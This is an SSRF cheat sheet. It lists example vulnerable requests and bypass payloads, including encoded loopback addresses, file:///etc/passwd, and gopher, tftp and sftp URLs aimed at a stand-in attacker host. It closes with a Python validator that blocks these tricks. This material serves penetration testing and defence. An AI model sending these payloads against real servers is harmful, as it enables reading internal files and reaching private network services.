SSRF

SSRF is usually found in requests that carry a URL for the server to fetch, for example:

POST /api/check/products HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Origin: https://example.com
Referer: https://example.com

urlApi=http://192.168.1.1%2fapi%2f&id=1

or

GET /image?url=http://192.168.1.1/ HTTP/1.1
Host: example.com

How to exploit

  1. Basic payload

http://127.0.0.1:1337
http://localhost:1337
  2. Hex encoding

http://127.0.0.1 -> http://0x7f.0x0.0x0.0x1
  3. Octal encoding

http://127.0.0.1 -> http://0177.0.0.01
  4. Dword encoding

http://127.0.0.1 -> http://2130706433
  5. Mixed encoding

http://127.0.0.1 -> http://0177.0.0.0x1
  6. Using URL encoding

http://localhost -> http://%6c%6f%63%61%6c%68%6f%73%74
  7. Using IPv6

http://0000::1:1337/
http://[::]:1337/
  8. Using bubble text

http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ

Bubble text can be generated with https://capitalizemytitle.com/bubble-text-generator/

How to exploit (URI Scheme)

  1. File scheme

file:///etc/passwd
  2. Dict scheme

dict://127.0.0.1:1337/
  3. FTP scheme

ftp://127.0.0.1/
  4. TFTP scheme

tftp://evil.com:1337/test
  5. SFTP scheme

sftp://evil.com:1337/test
  6. LDAP scheme

ldap://127.0.0.1:1337/
  7. Gopher scheme

gopher://evil.com/_Test%0ASSRF

gopher://evil.com/_Test%0ASSRF
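
Every host encoding and URI scheme listed above gets past a filter that compares the raw URL string against a blocklist. The following server-side check is an added example, not part of the original page: it canonicalises the host before deciding, and it covers both lists. The names `ALLOWED_HOSTS`, `canonical_host`, `parse_ipv4_any_radix` and `is_url_allowed` are assumptions made for illustration. Hostnames are matched against an allowlist only, because no DNS resolution happens here.

```python
import ipaddress
import unicodedata
from urllib.parse import unquote, urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # refuses file, dict, ftp, tftp, sftp, ldap, gopher
ALLOWED_HOSTS = {"api.example.com"}  # hypothetical allowlist of upstream names

def canonical_host(url):
    """Host after percent-decoding and NFKC folding, or None if the URL is refused."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return None
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return None
    host = unicodedata.normalize("NFKC", unquote(parts.hostname))
    return host.lower().rstrip(".")

def parse_ipv4_any_radix(host):
    """Parse decimal, hex, octal, dword and mixed IPv4 forms as inet_aton() does."""
    fields = host.split(".")
    if not 1 <= len(fields) <= 4:
        return None
    numbers = []
    for field in fields:
        if not (field.isascii() and field.isalnum()):
            return None
        base = 16 if field.startswith("0x") else 8 if field[0] == "0" and len(field) > 1 else 10
        try:
            numbers.append(int(field, base))
        except ValueError:
            return None
    *head, last = numbers  # the last field fills all remaining bytes
    if any(n > 255 for n in head) or last >= 256 ** (4 - len(head)):
        return None
    return ipaddress.IPv4Address(sum(n << (8 * (3 - i)) for i, n in enumerate(head)) + last)

def is_url_allowed(url):
    host = canonical_host(url)
    if host is None:
        return False
    ip = parse_ipv4_any_radix(host)
    if ip is None:
        try:
            ip = ipaddress.IPv6Address(host)
        except ValueError:
            return host in ALLOWED_HOSTS  # names: exact allowlist match only
    return ip.is_global  # refuses loopback, private and unspecified addresses
```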
